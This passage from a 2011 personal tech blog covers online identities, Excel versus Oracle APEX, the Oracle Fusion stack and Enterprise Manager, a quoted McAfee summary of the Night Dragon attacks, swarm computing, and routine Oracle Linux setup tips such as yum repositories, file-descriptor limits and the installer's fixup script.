During his talk he states some very good points to which I can relate. One of his main issues with the way online identities are managed today, by for example Facebook and Google, is that you can only have one single identity, which needs to be linked to the person you are in real life. Having a connection between your online identity and your offline identity is not a bad thing in itself; however, it is within human nature to have multiple identities. The average human will have multiple identities and will be able to tell them apart without having a mental issue. As an example, the identity which identifies you as a person at work will most likely be something else than how people identify you at your sports club. Your family will know you as yet another person.

When sharing with your Facebook identity all people will be able to read what you share; with this, Facebook is a real single-identity network. Google has launched Google+, where you can use circles in which you group people. You can share with everyone or with only the people in a certain circle. This is already a more segregated way of sharing and allows you to have multiple channels of expression under one single identity.

What Chris is promoting in his talk at the Web 2.0 Summit is that you should also have the option to post under an alias (handle), just to make sure that you can explore all kinds of different things you do not need to inform other people about (or explicitly do not want other people to know). For example, what do your coworkers need to know about your interest in ancient fire-making techniques? Maybe this is something private you only want to discuss online using your handle makefire1600, while you do not want your makefire friends to mingle with the people from your daily job.

There are all kinds of things to be said for having the option to have multiple IDs online, and it would be great if you could connect them all to one username/password-protected main identity without showing who you really are. Whether companies like Google and Facebook will ever go to this kind of account setup is a very big question, and I do not think they will start supporting it; however, it is an interesting question and theory to play with and I do think Chris has a point.

Excel hell

At all the companies I have worked for, as own staff or as a consultant for a certain period of time, I have encountered the love for Microsoft Excel or the spreadsheet application of another vendor. The reason for this is that people can quickly create and work with spreadsheets, use them to build analyses, create calculations and more. The ease of building is great, almost all employees have a copy of Excel on their laptop and most people understand it. The phrase “Excel management” is not an unknown term to most companies, as it looks like managers especially love Excel to look at reporting. When companies or departments need something more than Excel they tend to look at solutions like Microsoft Access, which is more a database-like application and tends to the more “complex” needs a department might have.

The issue with Excel files especially is that as soon as you put one out in the wild, by mailing it to other people to use, you no longer have control over it. For example, if you create a calculation model in Excel and send it to other people in the company, you do not have the option to track who is using it, and if you discover something you need to change there is no way of knowing that all people will use the latest version. A similar issue arises when you like to keep track of the status of things in an Excel sheet, for example the progress of work; you have no way of knowing and assuring that all people use the same version and that everything is captured.

In many cases the file is placed on a centralized storage location, for example a department's shared network location; the issue is that people tend to download it and place it on their own laptop. Take project progress for example: people working remotely will update the sheet on their local drive and, when they have a network connection again, try to upload / override the version on the network drive. I imagine everyone working on such projects will have an example of versions that overwrote someone else's work.

To cope with this issue it might be easier to have a centralized web application that holds all the features Excel is offering you and enables you to make more use of collaboration functions. Some options are available currently. You can have a look at the Microsoft Office 365 online applications, Google is providing Google Docs which holds a spreadsheet application, or you can have a look at Oracle APEX (Oracle Application Express). Oracle APEX is not comparable with the Office 365 or Google Docs solutions, which are more online spreadsheet solutions; APEX is more a quick solution to build applications with a spreadsheet background.

APEX provides you the option to quickly build a web application and even convert existing Excel spreadsheets into such an application. All user interface parts are provided out of the box, as well as user management and such things. With APEX you can have an application up and running in no time by only using your browser and without any programming needed. In my opinion it is not a hundred percent solution; however, for quickly building spreadsheet-avoiding solutions or small applications on a departmental level it is a great product. In the video below you can see what Oracle has to say about their own product. Big advantages are that you can install it even on your own laptop to play and experiment with it, it is easy to use and build upon, and the price… you can use it for free under certain rules.

Tuesday, September 27, 2011

Oracle Fusion Stack

Oracle Fusion, a term that has been buzzing around for years and getting a more mythical sound to it every year it is discussed. Fusion should be the answer to a lot of questions and it is coming, it is coming soon. Even though Oracle is promoting it and has been releasing a lot of buzz around it, some people are getting tired and confused. The expectation was that Oracle would provide a complete new stack in one go and that it would be branded in the same way as we have seen with 11G and 12G. I have been asked a couple of times by people within the company to talk to them about what the future of Oracle will be from a technology point of view, so I decided it would be a smart move to start blogging about it and provide all of you an insight into what I have found and what I think will be the future of Oracle from this point of view.

However, Oracle is releasing bits and parts of the Fusion stack. From a marketing perspective you can see this as smart, a buzz is created, or you can see this as a weakness: they started talking about something which was still lacking shape at that moment. What a lot of people do not realize is that there is a lot of Fusion out there, released possibly below the radar, or people do not get the picture that it is part of the new Fusion stack. The below diagram holds a high-level design of the Oracle eBS Fusion stack, from the database up to the functional modules. The picture comes from the manual Oracle Fusion Applications Administrator’s Guide 11g Release 1 ( launched as a draft in April 2011. Even though it is officially confidential, some people have released it to the public, so we are able to take a peek at the draft version; you can read it as an embedded document at the end of this blogpost.

Looking at the picture below you can get a glimpse of the stack to which Oracle refers as the Fusion stack. At the top we have the Oracle Fusion Application Product Families, which consist of a lot of Oracle e-Business Suite applications and modules and will be the new core of the Oracle Fusion applications. You can also see the Oracle Fusion Middleware stack; I will spend some blogposts in the upcoming time explaining it in more detail. You can see that most of this is based upon the Oracle Weblogic Server, which is not a surprise to most of you.
From an application point of view Oracle is dividing the applications into a couple of clusters, which I will blog about more in the upcoming posts. Below you can see them in a slide from an Oracle presentation. To name them: Oracle Fusion Financial Management, Oracle Fusion Human Capital Management, Oracle Fusion Supply Chain Management, Oracle Fusion Project Portfolio Management, Oracle Fusion Procurement, Oracle Fusion Customer Relationship Management and Oracle Fusion GRC, in full Oracle Fusion Governance, Risk and Compliance.
As you can notice, a great place is reserved in the stack for Oracle Enterprise Manager, which is a great part of the monitoring and maintenance stack from Oracle. What is missing in this picture is the hardware component of Oracle Enterprise Manager, which was added after the acquisition of Sun Microsystems and the creation of the ExaData and ExaLogic machines. Oracle is now able to monitor all parts of the stack, which includes both hardware and software.


Saturday, September 10, 2011

Oracle Enterprise Manager Cloud Management

As I have currently been working a lot on improving day-to-day operations and monitoring of large and complex IT landscapes, I have been looking a lot at Oracle Enterprise Manager. We are currently deploying Oracle Enterprise Manager to be the default monitoring and maintenance solution for a new cloud hosting platform. Oracle Enterprise Manager is great to manage parts of the cloud we are currently building and rolling out towards current and new customers of Capgemini.

However, when people think about cloud computing they tend to forget that there is still old-school hardware and operating systems involved. Even though you can make all kinds of things scalable, virtual and cloud-happy, someone will always have to have a datacenter somewhere which holds racks and racks of servers which hold operating systems and which run things. By using cloud computing the customer is no longer that aware of the real infrastructure; if you however build the cloud you are more than aware of all the infrastructure it takes to build a cloud computing solution. When you are the provider of the cloud you will have to think about how to set up your network, how to arrange your storage and how to align failover technology, virtualization layers, monitoring and much more.

As we at Capgemini are building a cloud computing solution especially for Oracle products, we have engineered Oracle Enterprise Manager deep into the mainstream architecture. Oracle Enterprise Manager is giving us some very big advantages, and thanks to Oracle buying Sun this is now extended with Oracle Ops Center.

When Oracle developed Oracle Enterprise Manager it was mainly focused on the applications and for some parts on the operating system, where Sun was focusing more on the hardware and some parts of the operating system (mainly Sun Solaris). Now the two companies have become one, the products are also merging, which gives you an enormous lift and a single tool to monitor and manage software and hardware. Both can be used separately but can also be integrated. Currently the integration is not as fluent as you might want; however, looking at the Oracle roadmap, the products will become more integrated with every release they bring out.

Especially when you are building a complex and large-scale landscape, like a cloud computing landscape for high-end customers running Oracle software, it is of great value that you can monitor and maintain your software, hardware and operating system from one single tool. Below you can see a short introduction video on Oracle Ops Center. If you have any questions on Oracle Ops Center and/or Oracle Enterprise Manager, leave a comment or drop me an e-mail.

Friday, August 05, 2011

Hacking from China

A very interesting whitepaper on security and hacking done, it is believed, by China. I think this whitepaper is a very good read to get some more understanding of the basics of the role of China in the world of today.

"Starting in November 2009, coordinated covert and targeted cyberattacks have been conducted against global oil, energy, and petrochemical companies. These attacks have involved social engineering, spearphishing attacks, exploitation of Microsoft Windows operating systems vulnerabilities, Microsoft Active Directory compromises, and the use of remote administration tools (RATs) in targeting and harvesting sensitive competitive proprietary operations and project-financing information with regard to oil and gas field bids and operations. We have identified the tools, techniques, and network activities used in these continuing attacks—which we have dubbed Night Dragon—as originating primarily in China. Through coordinated analysis of the related events and tools used, McAfee has determined identifying features to assist companies with detection and investigation. While we believe many actors have participated in these attacks, we have been able to identify one individual who has provided the crucial C&C infrastructure to the attackers."

Global Energy Cyber Attacks Night Dragon - McAfee

swarm computing

Swarm computing is thought to be the next version of cloud computing. The issue is that it is not quite clear what swarm computing is, while to some people it is not even clear yet what cloud computing is. For all who are interested in swarm computing you can find some more information below:

"Computing is rapidly moving away from traditional computers. Of the 8 billion computing units that will be deployed worldwide this year, only 150 million are stand-alone computers. Many programs in the future will run on collections of mobile processors interacting with the physical world and communicating over dynamic, ad hoc networks. We can view such a collection of devices as a swarm. As with natural swarms, such as a school of fish or an ant colony, the behavior of the swarm emerges from the simple behaviors of its individual members. The swarm is resilient to a small fraction of misbehaving members and to changes in the environment."

Swarm Computing

Also a very interesting source is this presentation from Oracle on swarm computing:

Monday, July 25, 2011

connect Oracle Linux to the public yum server

When you are installing an Oracle Linux system you most likely would like to keep it up to date. In a corporate environment you do not want to get updates and new software from a public location; however, when you are running a home system it may very well be that you would like to do this.

Oracle is providing two options: corporate users can connect to the Linux Support program by paying a fee to Oracle. If you are not, and are just using the system for your home server for example, you can connect to the public yum server from Oracle. To be able to connect your system to the public yum server you simply have to take the following action:

# cd /etc/yum.repos.d
# wget

After this you have to open the downloaded file in vi and make sure that you enable the channels you want to use for updating from the public Yum server. To enable one you have to set enabled=1 instead of enabled=0.

Now you can use the yum command to upgrade, update and install new software on your system. The great plus of yum is that dependencies are taken care of, downloaded and installed when needed, instead of turning your day into a dependency-solving nightmare.
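If you prefer not to open the file in vi, the same enabled=0 to enabled=1 change can be made with sed. The sketch below runs against a stand-in file with a made-up channel name; on a real system, point REPO at the file wget placed in /etc/yum.repos.d and flip only the channels you actually want.

```shell
# Stand-in repo file with one disabled channel (the channel name is made up)
REPO=demo.repo
printf '[el5_latest]\nname=Latest packages\nenabled=0\n' > "$REPO"

# Flip enabled=0 to enabled=1 for every channel in the file
sed -i 's/^enabled=0/enabled=1/' "$REPO"

grep '^enabled=' "$REPO"    # prints: enabled=1
```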

Friday, July 22, 2011

Oracle hardnofiles softnofiles resolved

When you are installing an Oracle product under Linux you might run into an issue with the settings for hardnofiles and softnofiles, which apply to the user running the installer and who will finally run the software on your server.

The failed check during installation will look something like the one below;

Checking for hardnofiles=4096; hardnofiles=1024. Failed <<<<
Checking for softnofiles=4096; softnofiles=1024. Failed <<<<

You can resolve this by setting a new limit for the user who will be installing and running the software (most likely the user oracle) or by setting it system-wide. To set it system-wide you have to edit the file /etc/security/limits.conf and add the following lines to it;

* soft nofile 65536
* hard nofile 65536

You can change 65536 to any value you think is needed. If you do not want to make it a system-wide value but have it set for a specific user, you can replace * with the username you want to set it for. For example, replace * with oracle and this value will only be set for the oracle user.
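Note that the new values only apply to fresh login sessions (the pam_limits module reads limits.conf at login time), and you can verify them with ulimit; a quick sketch:

```shell
# Log in again as the user the limits were set for, then check
# the effective open-file limits of the new session:
ulimit -Sn    # soft limit on open file descriptors
ulimit -Hn    # hard limit on open file descriptors
```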

Oracle database failed prerequisite

When you install an Oracle product you will hit the prerequisite page at some point in time. This will tell you what is missing on your system with respect to packages, kernel parameters and things like that. If you have a clean install of Oracle Linux you will hit some of those. In the below screenshot you see an example.

Something new is that you now have an option to have some of those fixed automatically. Click the "Fix & Check Again" button and you will see that a script named is created under /tmp/.... You have to run this as root and it will solve some of your issues. This is much easier than setting all the kernel parameters by hand.

[root@OEM CVU_11.]# ./
Response file being used is :./fixup.response
Enable file being used is :./fixup.enable
Log file location: ./orarun.log
Setting Kernel Parameters...
kernel.sem = 250 32000 100 128
fs.file-max = 6815744
net.ipv4.ip_local_port_range = 9000 65500
net.core.rmem_default = 262144
net.core.wmem_default = 262144
net.core.rmem_max = 4194304
net.core.wmem_max = 1048576
fs.aio-max-nr = 1048576
uid=500(oracle) gid=500(oinstall) groups=500(oinstall),501(oper),502(dba)
[root@OEM CVU_11.]#

Even though this is quite quick, it is always good to know how this can also be done by hand, so do it by hand every now and then just to keep your knowledge of Linux up to date.
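As a sketch of the by-hand route: the kernel parameters from the fixup output above normally go into /etc/sysctl.conf and are loaded with sysctl -p. The example stages them in a stand-in file so it is safe to try; on a real system, append the same lines to /etc/sysctl.conf and run sysctl -p as root.

```shell
# Stage the kernel parameters from the fixup output in a demo file;
# on a real system this content belongs in /etc/sysctl.conf
cat > sysctl-demo.conf <<'EOF'
kernel.sem = 250 32000 100 128
fs.file-max = 6815744
net.ipv4.ip_local_port_range = 9000 65500
net.core.rmem_default = 262144
net.core.wmem_default = 262144
net.core.rmem_max = 4194304
net.core.wmem_max = 1048576
fs.aio-max-nr = 1048576
EOF

grep -c '=' sysctl-demo.conf    # prints: 8 (parameters staged)
# sysctl -p sysctl-demo.conf    # would load them (requires root)
```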